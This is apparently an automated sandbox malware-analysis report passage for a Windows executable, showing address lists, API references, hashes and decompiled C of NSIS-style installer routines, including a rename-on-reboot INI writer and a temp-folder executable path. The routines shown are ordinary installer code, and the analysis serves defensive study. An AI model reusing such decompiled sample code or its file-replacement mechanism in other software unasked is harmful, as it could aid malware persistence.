                        0x004042a9
                        0x004042a6
                        0x004042a6
                        0x004042a6
                        0x004042b9
                        0x004042d1
                        0x004042d3
                        0x004042d9
                        0x004042ee
                        0x004042db
                        0x004042e4
                        0x004042e6
                        0x004042e6
                        0x004042f4
                        0x00404305
                        0x0040431b
                        0x00404322
                        0x00404328
                        0x0040432c
                        0x00404331
                        0x00404333
                        0x00000000
                        0x00404339
                        0x00404339
                        0x0040433b
                        0x00000000
                        0x00000000
                        0x00404341
                        0x00404345
                        0x0040436a
                        0x00404370
                        0x00404376
                        0x00404378
                        0x00000000
                        0x00000000
                        0x0040439e
                        0x004043a4
                        0x004043a6
                        0x004043ab
                        0x00000000
                        0x00000000
                        0x004043b1
                        0x004043b4
                        0x004043b7
                        0x004043ce
                        0x004043da
                        0x004043f3
                        0x004043f9
                        0x004043fd
                        0x00404402
                        0x00404408
                        0x00000000
                        0x00000000
                        0x00404412
                        0x0040441d
                        0x00000000
                        0x0040441d
                        0x00404347
                        0x0040434d
                        0x00000000
                        0x00000000
                        0x00404353
                        0x00404359
                        0x00000000
                        0x00000000
                        0x00000000
                        0x0040435f
                        0x00404333
                        0x0040442a
                        0x00404436
                        0x0040443d
                        0x00000000
                        0x00404188
                        0x00404188
                        0x0040418b
                        0x004041be
                        0x004041be
                        0x004041c0
                        0x00000000
                        0x00000000
                        0x00000000
                        0x004041c0
                        0x0040418d
                        0x00404191
                        0x00404196
                        0x00404198
                        0x00000000
                        0x00000000
                        0x004041a8
                        0x004041b0
                        0x00000000
                        0x004041b6
                        0x00403fbe
                        0x00403fbe
                        0x00403fc2
                        0x00403fc7
                        0x00403fd6
                        0x00403fd6
                        0x00403fdc
                        0x00403fe3
                        0x00404027
                        0x0040402d
                        0x00404046
                        0x00404049
                        0x0040405c
                        0x00404062
                        0x00000000
                        0x00000000
                        0x00404068
                        0x00404073
                        0x00404075
                        0x00404077
                        0x00404096
                        0x00404096
                        0x00404099
                        0x0040409e
                        0x004040a1
                        0x004040b1
                        0x004040b2
                        0x004040b4
                        0x004040ea
                        0x004040fa
                        0x00000000
                        0x004040fa
                        0x004040b6
                        0x004040bc
                        0x004040d5
                        0x004040da
                        0x004040dc
                        0x00000000
                        0x00000000
                        0x004040de
                        0x004040ca
                        0x004040ca
                        0x004040cc
                        0x004040cc
                        0x00000000
                        0x004040cc
                        0x004040bf
                        0x004040c4
                        0x00000000
                        0x004040c4
                        0x004040a3
                        0x004040a9
                        0x00000000
                        0x00000000
                        0x004040ab
                        0x00000000
                        0x004040ab
                        0x0040409b
                        0x00000000
                        0x0040409b
                        0x00404081
                        0x00404088
                        0x0040408e
                        0x00404090
                        0x00404466
                        0x00000000
                        0x00404466
                        0x00000000
                        0x00404090
                        0x0040404e
                        0x00000000
                        0x00404056
                        0x00404035
                        0x0040403b
                        0x00404443
                        0x00404449
                        0x00404456
                        0x0040445c
                        0x0040445c
                        0x00000000
                        0x00403fe5
                        0x00403fea
                        0x00403ff6
                        0x00403fff
                        0x00404100
                        0x00000000
                        0x0040401e
                        0x00404021
                        0x00000000
                        0x00404021
                        0x00403fff
                        0x00403fe3

                        APIs
                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403FD6
                        • ShowWindow.USER32(?), ref: 00403FF6
                        • GetWindowLongW.USER32(?,000000F0), ref: 00404008
                        • ShowWindow.USER32(?,00000004), ref: 00404021
                        • DestroyWindow.USER32 ref: 00404035
                        • SetWindowLongW.USER32 ref: 0040404E
                        • GetDlgItem.USER32 ref: 0040406D
                        • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00404081
                        • IsWindowEnabled.USER32(00000000), ref: 00404088
                        • GetDlgItem.USER32 ref: 00404133
                        • GetDlgItem.USER32 ref: 0040413D
                        • SetClassLongW.USER32(?,000000F2,?), ref: 00404157
                        • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 004041A8
                        • GetDlgItem.USER32 ref: 0040424E
                        • ShowWindow.USER32(00000000,?), ref: 0040426F
                        • EnableWindow.USER32(?,?), ref: 00404281
                        • EnableWindow.USER32(?,?), ref: 0040429C
                        • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 004042B2
                        • EnableMenuItem.USER32 ref: 004042B9
                        • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004042D1
                        • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004042E4
                        • lstrlenW.KERNEL32(0042D268,?,0042D268,00000000), ref: 0040430E
                        • SetWindowTextW.USER32(?,0042D268), ref: 00404322
                        • ShowWindow.USER32(?,0000000A), ref: 00404456
                        Memory Dump Source
                        • Source File: 00000000.00000002.672645823.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.672641565.0000000000400000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672652442.0000000000408000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672656687.000000000040A000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672661358.000000000040D000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672665051.0000000000414000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672669296.000000000041A000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672673110.000000000041E000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672676576.0000000000425000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672681388.0000000000431000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672686997.0000000000440000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672691764.000000000044C000.00000002.00020000.sdmp Download File
                        Similarity
                        • API ID: Window$Item$MessageSendShow$EnableLong$Menu$ClassDestroyEnabledSystemTextlstrlen
                        • String ID:
                        • API String ID: 1860320154-0
                        • Opcode ID: 655396db076bddd1a804ad939a9de1a35d1e50ec2b89a3d41d0d0026322ce3ca
                        • Instruction ID: 19e8ffe36521fda3862950d2389d84f1ef0c133ac5ff71005f69e3a94542e2f3
                        • Opcode Fuzzy Hash: 655396db076bddd1a804ad939a9de1a35d1e50ec2b89a3d41d0d0026322ce3ca
                        • Instruction Fuzzy Hash: DDC1A1B1A00704ABDB206F61EE49E2B3A68FB84746F15053EF741B61F1CB799841DB2D
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 91%
                        			E00404658(struct HWND__* _a4, int _a8, unsigned int _a12, WCHAR* _a16) {
                        				intOrPtr _v8;
                        				int _v12;
                        				void* _v16;
                        				struct HWND__* _t56;
                        				signed int _t75;
                        				signed short* _t76;
                        				signed short* _t78;
                        				long _t92;
                        				int _t103;
                        				signed int _t110;
                        				intOrPtr _t113;
                        				WCHAR* _t114;
                        				signed int* _t116;
                        				WCHAR* _t117;
                        				struct HWND__* _t118;
                        
                        				if(_a8 != 0x110) {
                        					if(_a8 != 0x111) {
                        						L13:
                        						if(_a8 != 0x4e) {
                        							if(_a8 == 0x40b) {
                        								 *0x42b234 =  *0x42b234 + 1;
                        							}
                        							L27:
                        							_t114 = _a16;
                        							L28:
                        							return E00404500(_a8, _a12, _t114);
                        						}
                        						_t56 = GetDlgItem(_a4, 0x3e8);
                        						_t114 = _a16;
                        						if( *((intOrPtr*)(_t114 + 8)) == 0x70b &&  *((intOrPtr*)(_t114 + 0xc)) == 0x201) {
                        							_t103 =  *((intOrPtr*)(_t114 + 0x1c));
                        							_t113 =  *((intOrPtr*)(_t114 + 0x18));
                        							_v12 = _t103;
                        							_v16 = _t113;
                        							_v8 = 0x432ea0;
                        							if(_t103 - _t113 < 0x800) {
                        								SendMessageW(_t56, 0x44b, 0,  &_v16);
                        								SetCursor(LoadCursorW(0, 0x7f02));
                        								_push(1);
                        								E00404907(_a4, _v8);
                        								SetCursor(LoadCursorW(0, 0x7f00));
                        								_t114 = _a16;
                        							}
                        						}
                        						if( *((intOrPtr*)(_t114 + 8)) != 0x700 ||  *((intOrPtr*)(_t114 + 0xc)) != 0x100) {
                        							goto L28;
                        						} else {
                        							if( *((intOrPtr*)(_t114 + 0x10)) == 0xd) {
                        								SendMessageW( *0x434f08, 0x111, 1, 0);
                        							}
                        							if( *((intOrPtr*)(_t114 + 0x10)) == 0x1b) {
                        								SendMessageW( *0x434f08, 0x10, 0, 0);
                        							}
                        							return 1;
                        						}
                        					}
                        					if(_a12 >> 0x10 != 0 ||  *0x42b234 != 0) {
                        						goto L27;
                        					} else {
                        						_t116 =  *0x42c240 + 0x14;
                        						if(( *_t116 & 0x00000020) == 0) {
                        							goto L27;
                        						}
                        						 *_t116 =  *_t116 & 0xfffffffe | SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
                        						E004044BB(SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
                        						E004048E3();
                        						goto L13;
                        					}
                        				}
                        				_t117 = _a16;
                        				_t75 =  *(_t117 + 0x30);
                        				if(_t75 < 0) {
                        					_t75 =  *( *0x433edc - 4 + _t75 * 4);
                        				}
                        				_t76 =  *0x434f38 + _t75 * 2;
                        				_t110 =  *_t76 & 0x0000ffff;
                        				_a8 = _t110;
                        				_t78 =  &(_t76[1]);
                        				_a16 = _t78;
                        				_v16 = _t78;
                        				_v12 = 0;
                        				_v8 = E00404609;
                        				if(_t110 != 2) {
                        					_v8 = E004045CF;
                        				}
                        				_push( *((intOrPtr*)(_t117 + 0x34)));
                        				_push(0x22);
                        				E00404499(_a4);
                        				_push( *((intOrPtr*)(_t117 + 0x38)));
                        				_push(0x23);
                        				E00404499(_a4);
                        				CheckDlgButton(_a4, (0 | ( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
                        				E004044BB( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001);
                        				_t118 = GetDlgItem(_a4, 0x3e8);
                        				E004044CE(_t118);
                        				SendMessageW(_t118, 0x45b, 1, 0);
                        				_t92 =  *( *0x434f10 + 0x68);
                        				if(_t92 < 0) {
                        					_t92 = GetSysColor( ~_t92);
                        				}
                        				SendMessageW(_t118, 0x443, 0, _t92);
                        				SendMessageW(_t118, 0x445, 0, 0x4010000);
                        				SendMessageW(_t118, 0x435, 0, lstrlenW(_a16));
                        				 *0x42b234 = 0;
                        				SendMessageW(_t118, 0x449, _a8,  &_v16);
                        				 *0x42b234 = 0;
                        				return 0;
                        			}


















                        0x0040466a
                        0x00404797
                        0x004047f4
                        0x004047f8
                        0x004048c5
                        0x004048c7
                        0x004048c7
                        0x004048cd
                        0x004048cd
                        0x004048d0
                        0x00000000
                        0x004048d7
                        0x00404806
                        0x0040480c
                        0x00404816
                        0x00404821
                        0x00404824
                        0x00404827
                        0x00404832
                        0x00404835
                        0x0040483c
                        0x00404849
                        0x0040485a
                        0x00404860
                        0x00404868
                        0x00404876
                        0x0040487c
                        0x0040487c
                        0x0040483c
                        0x00404886
                        0x00000000
                        0x00404891
                        0x00404895
                        0x004048a5
                        0x004048a5
                        0x004048ab
                        0x004048b7
                        0x004048b7
                        0x00000000
                        0x004048bb
                        0x00404886
                        0x004047a2
                        0x00000000
                        0x004047b4
                        0x004047b9
                        0x004047bf
                        0x00000000
                        0x00000000
                        0x004047e8
                        0x004047ea
                        0x004047ef
                        0x00000000
                        0x004047ef
                        0x004047a2
                        0x00404670
                        0x00404673
                        0x00404678
                        0x00404689
                        0x00404689
                        0x00404691
                        0x00404694
                        0x00404698
                        0x0040469b
                        0x0040469f
                        0x004046a2
                        0x004046a5
                        0x004046a8
                        0x004046af
                        0x004046b1
                        0x004046b1
                        0x004046bb
                        0x004046c8
                        0x004046d2
                        0x004046d7
                        0x004046da
                        0x004046df
                        0x004046f6
                        0x004046fd
                        0x00404710
                        0x00404713
                        0x00404727
                        0x0040472e
                        0x00404733
                        0x00404738
                        0x00404738
                        0x00404746
                        0x00404754
                        0x00404766
                        0x0040476b
                        0x0040477b
                        0x0040477d
                        0x00000000

                        APIs
                        • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 004046F6
                        • GetDlgItem.USER32 ref: 0040470A
                        • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404727
                        • GetSysColor.USER32(?), ref: 00404738
                        • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404746
                        • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 00404754
                        • lstrlenW.KERNEL32(?), ref: 00404759
                        • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404766
                        • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 0040477B
                        • GetDlgItem.USER32 ref: 004047D4
                        • SendMessageW.USER32(00000000), ref: 004047DB
                        • GetDlgItem.USER32 ref: 00404806
                        • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404849
                        • LoadCursorW.USER32(00000000,00007F02), ref: 00404857
                        • SetCursor.USER32(00000000), ref: 0040485A
                        • LoadCursorW.USER32(00000000,00007F00), ref: 00404873
                        • SetCursor.USER32(00000000), ref: 00404876
                        • SendMessageW.USER32(00000111,00000001,00000000), ref: 004048A5
                        • SendMessageW.USER32(00000010,00000000,00000000), ref: 004048B7
                        Strings
                        • N, xrefs: 004047F4
                        • C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exe, xrefs: 00404835
                        Memory Dump Source
                        • Source File: 00000000.00000002.672645823.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.672641565.0000000000400000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672652442.0000000000408000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672656687.000000000040A000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672661358.000000000040D000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672665051.0000000000414000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672669296.000000000041A000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672673110.000000000041E000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672676576.0000000000425000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672681388.0000000000431000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672686997.0000000000440000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672691764.000000000044C000.00000002.00020000.sdmp Download File
                        Similarity
                        • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                        • String ID: C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exe$N
                        • API String ID: 3103080414-3562321355
                        • Opcode ID: ce357ac6e0fd4f2b4f67e04795876aef6a46bd5fea1783cb4cf669a44dc9f0f8
                        • Instruction ID: e0aa441e67ff77812dea5cfa76c138b5706349c0d06c8e95e02877fce1cb63d1
                        • Opcode Fuzzy Hash: ce357ac6e0fd4f2b4f67e04795876aef6a46bd5fea1783cb4cf669a44dc9f0f8
                        • Instruction Fuzzy Hash: 1A61A3B5900209BFDB10AF60DD85E6A7BA9FB44314F00843AFB05B62D0D778A951DF98
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 90%
                        			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
                        				struct tagLOGBRUSH _v16;
                        				struct tagRECT _v32;
                        				struct tagPAINTSTRUCT _v96;
                        				struct HDC__* _t70;
                        				struct HBRUSH__* _t87;
                        				struct HFONT__* _t94;
                        				long _t102;
                        				signed int _t126;
                        				struct HDC__* _t128;
                        				intOrPtr _t130;
                        
                        				if(_a8 == 0xf) {
                        					_t130 =  *0x434f10;
                        					_t70 = BeginPaint(_a4,  &_v96);
                        					_v16.lbStyle = _v16.lbStyle & 0x00000000;
                        					_a8 = _t70;
                        					GetClientRect(_a4,  &_v32);
                        					_t126 = _v32.bottom;
                        					_v32.bottom = _v32.bottom & 0x00000000;
                        					while(_v32.top < _t126) {
                        						_a12 = _t126 - _v32.top;
                        						asm("cdq");
                        						asm("cdq");
                        						asm("cdq");
                        						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
                        						_t87 = CreateBrushIndirect( &_v16);
                        						_v32.bottom = _v32.bottom + 4;
                        						_a16 = _t87;
                        						FillRect(_a8,  &_v32, _t87);
                        						DeleteObject(_a16);
                        						_v32.top = _v32.top + 4;
                        					}
                        					if( *(_t130 + 0x58) != 0xffffffff) {
                        						_t94 = CreateFontIndirectW( *(_t130 + 0x34));
                        						_a16 = _t94;
                        						if(_t94 != 0) {
                        							_t128 = _a8;
                        							_v32.left = 0x10;
                        							_v32.top = 8;
                        							SetBkMode(_t128, 1);
                        							SetTextColor(_t128,  *(_t130 + 0x58));
                        							_a8 = SelectObject(_t128, _a16);
                        							DrawTextW(_t128, 0x433f00, 0xffffffff,  &_v32, 0x820);
                        							SelectObject(_t128, _a8);
                        							DeleteObject(_a16);
                        						}
                        					}
                        					EndPaint(_a4,  &_v96);
                        					return 0;
                        				}
                        				_t102 = _a16;
                        				if(_a8 == 0x46) {
                        					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
                        					 *((intOrPtr*)(_t102 + 4)) =  *0x434f08;
                        				}
                        				return DefWindowProcW(_a4, _a8, _a12, _t102);
                        			}













                        0x0040100a
                        0x00401039
                        0x00401047
                        0x0040104d
                        0x00401051
                        0x0040105b
                        0x00401061
                        0x00401064
                        0x004010f3
                        0x00401089
                        0x0040108c
                        0x004010a6
                        0x004010bd
                        0x004010cc
                        0x004010cf
                        0x004010d5
                        0x004010d9
                        0x004010e4
                        0x004010ed
                        0x004010ef
                        0x004010ef
                        0x00401100
                        0x00401105
                        0x0040110d
                        0x00401110
                        0x00401112
                        0x00401118
                        0x0040111f
                        0x00401126
                        0x00401130
                        0x00401142
                        0x00401156
                        0x00401160
                        0x00401165
                        0x00401165
                        0x00401110
                        0x0040116e
                        0x00000000
                        0x00401178
                        0x00401010
                        0x00401013
                        0x00401015
                        0x0040101f
                        0x0040101f
                        0x00000000

                        APIs
                        • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                        • BeginPaint.USER32(?,?), ref: 00401047
                        • GetClientRect.USER32 ref: 0040105B
                        • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                        • FillRect.USER32 ref: 004010E4
                        • DeleteObject.GDI32(?), ref: 004010ED
                        • CreateFontIndirectW.GDI32(?), ref: 00401105
                        • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                        • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                        • SelectObject.GDI32(00000000,?), ref: 00401140
                        • DrawTextW.USER32(00000000,00433F00,000000FF,00000010,00000820), ref: 00401156
                        • SelectObject.GDI32(00000000,00000000), ref: 00401160
                        • DeleteObject.GDI32(?), ref: 00401165
                        • EndPaint.USER32(?,?), ref: 0040116E
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.672645823.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.672641565.0000000000400000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672652442.0000000000408000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672656687.000000000040A000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672661358.000000000040D000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672665051.0000000000414000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672669296.000000000041A000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672673110.000000000041E000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672676576.0000000000425000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672681388.0000000000431000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672686997.0000000000440000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672691764.000000000044C000.00000002.00020000.sdmp Download File
                        Similarity
                        • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                        • String ID: F
                        • API String ID: 941294808-1304234792
                        • Opcode ID: 15a6b7738402934ac822911e252168026e8f0364f08849f6e110b85e8bc9718e
                        • Instruction ID: e457e53e67a16f607b198c8be77aa7e47a8fd9e6aa67a1a07366d16d1d2d9a76
                        • Opcode Fuzzy Hash: 15a6b7738402934ac822911e252168026e8f0364f08849f6e110b85e8bc9718e
                        • Instruction Fuzzy Hash: 0E418B71800209AFCF058FA5DE459AF7FB9FF44315F04802AF991AA1A0C738AA55DFA4
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E00406183(void* __ecx) {
                        				void* __ebx;
                        				void* __edi;
                        				void* __esi;
                        				long _t12;
                        				long _t24;
                        				char* _t31;
                        				int _t37;
                        				void* _t38;
                        				intOrPtr* _t39;
                        				long _t42;
                        				WCHAR* _t44;
                        				void* _t46;
                        				void* _t48;
                        				void* _t49;
                        				void* _t52;
                        				void* _t53;
                        
                        				_t38 = __ecx;
                        				_t44 =  *(_t52 + 0x14);
                        				 *0x430908 = 0x55004e;
                        				 *0x43090c = 0x4c;
                        				if(_t44 == 0) {
                        					L3:
                        					_t12 = GetShortPathNameW( *(_t52 + 0x1c), 0x431108, 0x400);
                        					if(_t12 != 0 && _t12 <= 0x400) {
                        						_t37 = wsprintfA(0x430508, "%ls=%ls\r\n", 0x430908, 0x431108);
                        						_t53 = _t52 + 0x10;
                        						E0040657A(_t37, 0x400, 0x431108, 0x431108,  *((intOrPtr*)( *0x434f10 + 0x128)));
                        						_t12 = E0040602D(0x431108, 0xc0000000, 4);
                        						_t48 = _t12;
                        						 *(_t53 + 0x18) = _t48;
                        						if(_t48 != 0xffffffff) {
                        							_t42 = GetFileSize(_t48, 0);
                        							_t6 = _t37 + 0xa; // 0xa
                        							_t46 = GlobalAlloc(0x40, _t42 + _t6);
                        							if(_t46 == 0 || E004060B0(_t48, _t46, _t42) == 0) {
                        								L18:
                        								return CloseHandle(_t48);
                        							} else {
                        								if(E00405F92(_t38, _t46, "[Rename]\r\n") != 0) {
                        									_t49 = E00405F92(_t38, _t21 + 0xa, "\n[");
                        									if(_t49 == 0) {
                        										_t48 =  *(_t53 + 0x18);
                        										L16:
                        										_t24 = _t42;
                        										L17:
                        										E00405FE8(_t24 + _t46, 0x430508, _t37);
                        										SetFilePointer(_t48, 0, 0, 0);
                        										E004060DF(_t48, _t46, _t42 + _t37);
                        										GlobalFree(_t46);
                        										goto L18;
                        									}
                        									_t39 = _t46 + _t42;
                        									_t31 = _t39 + _t37;
                        									while(_t39 > _t49) {
                        										 *_t31 =  *_t39;
                        										_t31 = _t31 - 1;
                        										_t39 = _t39 - 1;
                        									}
                        									_t24 = _t49 - _t46 + 1;
                        									_t48 =  *(_t53 + 0x18);
                        									goto L17;
                        								}
                        								lstrcpyA(_t46 + _t42, "[Rename]\r\n");
                        								_t42 = _t42 + 0xa;
                        								goto L16;
                        							}
                        						}
                        					}
                        				} else {
                        					CloseHandle(E0040602D(_t44, 0, 1));
                        					_t12 = GetShortPathNameW(_t44, 0x430908, 0x400);
                        					if(_t12 != 0 && _t12 <= 0x400) {
                        						goto L3;
                        					}
                        				}
                        				return _t12;
                        			}



















                        0x00406183
                        0x0040618c
                        0x00406193
                        0x0040619d
                        0x004061b1
                        0x004061d9
                        0x004061e4
                        0x004061e8
                        0x00406208
                        0x0040620f
                        0x00406219
                        0x00406226
                        0x0040622b
                        0x00406230
                        0x00406234
                        0x00406243
                        0x00406245
                        0x00406252
                        0x00406256
                        0x004062f1
                        0x00000000
                        0x0040626c
                        0x00406279
                        0x0040629d
                        0x004062a1
                        0x004062c0
                        0x004062c4
                        0x004062c4
                        0x004062c6
                        0x004062cf
                        0x004062da
                        0x004062e5
                        0x004062eb
                        0x00000000
                        0x004062eb
                        0x004062a3
                        0x004062a6
                        0x004062b1
                        0x004062ad
                        0x004062af
                        0x004062b0
                        0x004062b0
                        0x004062b8
                        0x004062ba
                        0x00000000
                        0x004062ba
                        0x00406284
                        0x0040628a
                        0x00000000
                        0x0040628a
                        0x00406256
                        0x00406234
                        0x004061b3
                        0x004061be
                        0x004061c7
                        0x004061cb
                        0x00000000
                        0x00000000
                        0x004061cb
                        0x004062fc

                        APIs
                        • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,0040631E,?,?), ref: 004061BE
                        • GetShortPathNameW.KERNEL32 ref: 004061C7
                          • Part of subcall function 00405F92: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FA2
                          • Part of subcall function 00405F92: lstrlenA.KERNEL32(00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FD4
                        • GetShortPathNameW.KERNEL32 ref: 004061E4
                        • wsprintfA.USER32 ref: 00406202
                        • GetFileSize.KERNEL32(00000000,00000000,00431108,C0000000,00000004,00431108,?,?,?,?,?), ref: 0040623D
                        • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 0040624C
                        • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406284
                        • SetFilePointer.KERNEL32(0040A580,00000000,00000000,00000000,00000000,00430508,00000000,-0000000A,0040A580,00000000,[Rename],00000000,00000000,00000000), ref: 004062DA
                        • GlobalFree.KERNEL32 ref: 004062EB
                        • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 004062F2
                          • Part of subcall function 0040602D: GetFileAttributesW.KERNELBASE(00000003,004030BD,00443800,80000000,00000003,?,?,?,?,?,0040387D,?), ref: 00406031
                          • Part of subcall function 0040602D: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,?,?,0040387D,?), ref: 00406053
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.672645823.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.672641565.0000000000400000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672652442.0000000000408000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672656687.000000000040A000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672661358.000000000040D000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672665051.0000000000414000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672669296.000000000041A000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672673110.000000000041E000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672676576.0000000000425000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672681388.0000000000431000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672686997.0000000000440000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672691764.000000000044C000.00000002.00020000.sdmp Download File
                        Similarity
                        • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                        • String ID: %ls=%ls$[Rename]
                        • API String ID: 2171350718-461813615
                        • Opcode ID: 6203cc16da91056e546519e3ab518561ff1c14b2742299aa71b9d8e7299f7fea
                        • Instruction ID: 71978d88b6039f89b25a0dfa2ffa892efa56fbf884cfe692307f7793e751c739
                        • Opcode Fuzzy Hash: 6203cc16da91056e546519e3ab518561ff1c14b2742299aa71b9d8e7299f7fea
                        • Instruction Fuzzy Hash: 6A314670200716BBD2207B659D48F6B3A6CEF45754F15017EFA42F62C2EA3CA821867D
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 72%
                        			E0040657A(void* __ebx, void* __edi, void* __esi, signed int _a4, short _a8) {
                        				struct _ITEMIDLIST* _v8;
                        				signed int _v12;
                        				signed int _v16;
                        				signed int _v20;
                        				signed int _v24;
                        				signed int _v28;
                        				signed int _t44;
                        				WCHAR* _t45;
                        				signed char _t47;
                        				signed int _t48;
                        				short _t59;
                        				short _t61;
                        				short _t63;
                        				void* _t71;
                        				signed int _t77;
                        				signed int _t78;
                        				short _t81;
                        				short _t82;
                        				signed char _t84;
                        				signed int _t85;
                        				void* _t98;
                        				void* _t104;
                        				intOrPtr* _t105;
                        				void* _t107;
                        				WCHAR* _t108;
                        				void* _t110;
                        
                        				_t107 = __esi;
                        				_t104 = __edi;
                        				_t71 = __ebx;
                        				_t44 = _a8;
                        				if(_t44 < 0) {
                        					_t44 =  *( *0x433edc - 4 + _t44 * 4);
                        				}
                        				_push(_t71);
                        				_push(_t107);
                        				_push(_t104);
                        				_t105 =  *0x434f38 + _t44 * 2;
                        				_t45 = 0x432ea0;
                        				_t108 = 0x432ea0;
                        				if(_a4 >= 0x432ea0 && _a4 - 0x432ea0 >> 1 < 0x800) {
                        					_t108 = _a4;
                        					_a4 = _a4 & 0x00000000;
                        				}
                        				_t81 =  *_t105;
                        				_a8 = _t81;
                        				if(_t81 == 0) {
                        					L43:
                        					 *_t108 =  *_t108 & 0x00000000;
                        					if(_a4 == 0) {
                        						return _t45;
                        					}
                        					return E0040653D(_a4, _t45);
                        				} else {
                        					while((_t108 - _t45 & 0xfffffffe) < 0x800) {
                        						_t98 = 2;
                        						_t105 = _t105 + _t98;
                        						if(_t81 >= 4) {
                        							if(__eflags != 0) {
                        								 *_t108 = _t81;
                        								_t108 = _t108 + _t98;
                        								__eflags = _t108;
                        							} else {
                        								 *_t108 =  *_t105;
